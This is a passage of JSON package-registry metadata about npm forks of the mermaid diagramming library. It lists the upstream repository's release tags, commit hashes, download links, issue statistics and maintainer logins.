cosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2024-06-26T14:15:15.375Z","dependent_packages_count":1,"downloads":4,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":8.439934503317511,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.11970062885094405,"forks_count":0.6948656553207404,"average":13.48995232615788},"purl":"pkg:npm/%40deboxsoft/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deboxsoft/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deboxsoft/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deboxsoft/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2024-06-26T13:32:06.916Z","issues_count":1381,"pull_requests_count":878,"avg_time_to_close_issue":37537338.95228628,"avg_time_to_close_pull_request":1475163.046875,"issues_closed_count":498,"pull_requests_closed_count":702,"pull_request_authors_count":192,"issue_authors_count":732,"avg_comments_per_issue":4.674149167270094,"avg_comments_per_pull_request":3.591116173120729,"merged_pull_requests_count":607,"bot_issues_count":1,"bot_pull_requests_count":96,"past_year_issues_count":584,"past_year_pull_requests_count":656,"past_year_avg_time_to_close_issue":2515989.0529100527,"past_year_avg_time_to_close_pull_request":1080835.74749499,"past_year_issues_closed_count":188,"past_year_pull_requests_closed_count":497,"past_year_pull_request_authors_count":165,"past_year_issue_authors_count":323,"past_year_avg_comments_per_issue":2.191780821917808,"past_year_avg_comments_per_pull_request":3.792682926829268,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":91,"past_year_merged_pull_requests_count":415,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":320,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":45,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"Yokozuna59","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"aloisklink","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"knsv","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"Yash-Singh1","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"GDFaber","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"ashishjain0512","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":151,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"Yokozuna59","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"aloisklink","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"knsv","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"Yash-Singh1","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deboxsoft%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deboxsoft%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deboxsoft%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deboxsoft%2Fmermaid/related_packages","maintainers":[{"uuid":"nurdiansyah","login":"nurdiansyah","name":null,"email":"deboxserver@gmail.com","url":null,"packages_count":154,"html_url":"https://www.npmjs.com/~nurdiansyah","role":null,"created_at":"2023-02-17T20:51:07.773Z","updated_at":"2023-02-17T20:51:07.773Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nurdiansyah/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8653239,"name":"@diegosogari/mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":"diegosogari","versions_count":10,"first_release_published_at":"2023-12-18T20:37:49.488Z","latest_release_published_at":"2023-12-25T04:14:11.999Z","latest_release_number":"10.6.2-b9","last_synced_at":"2025-09-01T12:55:59.066Z","created_at":"2023-12-18T21:15:18.084Z","updated_at":"2025-09-01T14:17:51.379Z","registry_url":"https://www.npmjs.com/package/@diegosogari/mermaid","install_command":"npm install @diegosogari/mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.6.2-b9"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as 